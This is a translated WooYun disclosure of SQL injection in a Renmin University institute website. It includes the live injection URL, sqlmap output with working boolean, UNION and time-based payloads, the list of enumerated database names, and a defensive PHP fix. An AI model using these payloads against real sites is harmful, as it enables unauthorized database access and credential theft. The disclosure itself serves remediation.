
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0142174

Title: SQL injection in a site of Renmin University of China!

Vendor: Renmin University of China

Author: 心云

Submitted: 2015-09-22 23:57

Fixed: 2015-11-11 12:02

Published: 2015-11-11 12:02

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 17

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-09-22: Details sent to the vendor, awaiting vendor handling
2015-09-27: Vendor confirmed; details disclosed to the vendor only
2015-10-07: Details disclosed to core white hats and experts in related fields
2015-10-17: Details disclosed to regular white hats
2015-10-27: Details disclosed to intern white hats
2015-11-11: Details disclosed to the public

Brief description:

The Hanqing Advanced Institute of Economics and Finance at Renmin University of China (hereafter "Hanqing Institute") is a new, internationally oriented school established at Renmin University of China with a donation from the entrepreneur Mr. Zhao Hanqing. It was formally inaugurated in March 2007, with Professor Ji Baocheng, former president of Renmin University of China, and Nobel laureate in economics Professor Stiglitz serving as honorary deans. Professor Liang Jing serves as executive dean and runs the institute. The institute also established an academic committee chaired by Professor Huang Da, former president of Renmin University of China, Professor Gregory Chow (邹至庄) of Princeton University, Professor Wu Xiaoling, vice-chair of the Financial and Economic Affairs Committee of the National People's Congress, Professor Wei Xiong (熊伟) of Princeton University, and Professor Harrison Hong (洪瀚) of Stanford University.

Detailed description:

Administrator passwords for multiple sites can be obtained.
Injection point:
http://www.hanqing.ruc.edu.cn/artice_list.php?class=gjjl&iClassID=34

Proof of vulnerability:

[00:20:23] [INFO] testing connection to the target url
[00:20:24] [INFO] heuristics detected web page charset 'ISO-8859-2'
[00:20:24] [INFO] testing if the url is stable, wait a few seconds
[00:20:26] [INFO] url is stable
[00:20:26] [INFO] testing if GET parameter 'class' is dynamic
[00:20:27] [INFO] confirming that GET parameter 'class' is dynamic
[00:20:28] [INFO] GET parameter 'class' is dynamic
[00:20:29] [WARNING] reflective value(s) found and filtering out
[00:20:29] [WARNING] heuristic test shows that GET parameter 'class' might not be injectable
[00:20:29] [INFO] testing for SQL injection on GET parameter 'class'
[00:20:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:20:43] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[00:20:50] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[00:20:56] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[00:21:02] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[00:21:09] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[00:21:14] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[00:21:20] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[00:21:26] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[00:21:37] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[00:21:44] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[00:21:51] [INFO] testing 'Oracle AND time-based blind'
[00:22:00] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[00:23:13] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[00:23:13] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using the --dbms option
[00:24:31] [WARNING] GET parameter 'class' is not injectable
[00:24:31] [INFO] testing if GET parameter 'iClassID' is dynamic
[00:24:32] [INFO] confirming that GET parameter 'iClassID' is dynamic
[00:24:33] [INFO] GET parameter 'iClassID' is dynamic
[00:24:34] [WARNING] heuristic test shows that GET parameter 'iClassID' might not be injectable
[00:24:34] [INFO] testing for SQL injection on GET parameter 'iClassID'
[00:24:34] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:24:38] [INFO] GET parameter 'iClassID' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[00:24:38] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[00:24:39] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[00:24:40] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[00:24:41] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[00:24:41] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[00:24:42] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[00:24:43] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[00:24:44] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[00:25:44] [INFO] GET parameter 'iClassID' is 'MySQL > 5.0.11 AND time-based blind' injectable
[00:25:44] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[00:25:44] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
[00:25:46] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[00:25:52] [INFO] target url appears to have 38 columns in query
[00:26:29] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[00:26:29] [WARNING] most probably web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for few minutes and rerun without flag T in option '--technique' (e.g. --flush-session --technique=BEUS) or try to lower the value of option '--time-sec' (e.g. --time-sec=2)
[00:27:12] [INFO] GET parameter 'iClassID' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'iClassID' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 233 HTTP(s) requests:
---
Place: GET
Parameter: iClassID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: class=gjjl&iClassID=34 AND 7256=7256
Type: UNION query
Title: MySQL UNION query (NULL) - 38 columns
Payload: class=gjjl&iClassID=34 LIMIT 1,1 UNION ALL SELECT NULL, NULL, CONCAT(0x3a6672613a,0x446f6d597153646b6a53,0x3a6973743a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: class=gjjl&iClassID=34 AND SLEEP(5)
---
[00:46:17] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.4.6, PHP 5.4.16
back-end DBMS: MySQL 5.0.11
[00:46:17] [INFO] fetching database names
available databases [17]:
[*] demo_hanqing
[*] demo_hq2014
[*] demo_hq2015
[*] demo_hq_bak
[*] demo_hqen
[*] demo_psycamp2014
[*] demo_psyweb
[*] hanqing_research
[*] hanqing_sign
[*] huazi
[*] hxzcw
[*] information_schema
[*] lieren
[*] mysql
[*] ocity
[*] performance_schema
[*] weixin_yingtao


[Screenshots (images not included): demo_hangqing.png, demo_hangqing_tables.png, demo_hangqing_admin.png, demo_hangqing_admin2.png, demo_hangqing_admin3.png]


Remediation:

Strict input filtering.
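As an added illustration of that remediation (this is not code from the report or from the affected site, whose source is not shown), here is a PHP handler for the two GET parameters at the injection point: the unsafe concatenation pattern appears as a comment beside a hardened version that validates iClassID as an integer, whitelists class, and binds both through a PDO prepared statement. The table name, column names, DSN and credentials are assumptions.

```php
<?php
// Added example, not the affected site's code (which the report does not show).
// Assumptions: table `article` with columns id, title, pubdate, class, iClassID;
// DSN and credentials are placeholders.
// UNSAFE pattern: both GET values are spliced into the SQL string, so a value
// such as iClassID=34 AND SLEEP(5) runs as SQL, exactly as the sqlmap run above shows.
// $sql = "SELECT * FROM article WHERE class='" . $_GET['class'] . "'"
//      . " AND iClassID=" . $_GET['iClassID'];

// Hardened handling: validate both parameters, then bind them as data.
function validateParams(array $get)
{
    // iClassID must be a plain non-negative integer; anything else is rejected.
    $id = isset($get['iClassID'])
        ? filter_var($get['iClassID'], FILTER_VALIDATE_INT, array('options' => array('min_range' => 0)))
        : false;
    if ($id === false) {
        throw new InvalidArgumentException('iClassID must be a non-negative integer');
    }
    // class is a short code such as gjjl: allow only lowercase letters and digits.
    $class = isset($get['class']) ? $get['class'] : '';
    if (!preg_match('/^[a-z0-9]{1,16}$/', $class)) {
        throw new InvalidArgumentException('class has an invalid format');
    }
    return array('class' => $class, 'iClassID' => $id);
}

function fetchArticles(PDO $db, array $get)
{
    $p = validateParams($get);
    // Prepared statement: values are bound, never concatenated, so a suffix like
    // " AND 7256=7256" can only fail validation and never reaches the SQL parser.
    $stmt = $db->prepare(
        'SELECT id, title, pubdate FROM article WHERE class = :class AND iClassID = :id'
    );
    $stmt->bindValue(':class', $p['class'], PDO::PARAM_STR);
    $stmt->bindValue(':id', $p['iClassID'], PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}
$db = new PDO('mysql:host=localhost;dbname=demo_hanqing;charset=utf8', 'app_user', 'PLACEHOLDER_PASSWORD');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->setAttribute(PDO::ATTR_EMULATE_PREPARES, false); // use real server-side prepares
try {
    $rows = fetchArticles($db, $_GET);
} catch (InvalidArgumentException $e) {
    http_response_code(400);
    exit('Bad request');
}
```

The integer check alone would already have rejected every payload sqlmap reported for iClassID; the prepared statement is what makes the query safe even if validation is later weakened.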

Copyright notice: when reposting, please credit the source: 心云@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 8

Confirmed: 2015-09-27 12:02

Vendor reply:

We will notify the relevant staff to handle it as soon as possible.

Latest status:

None yet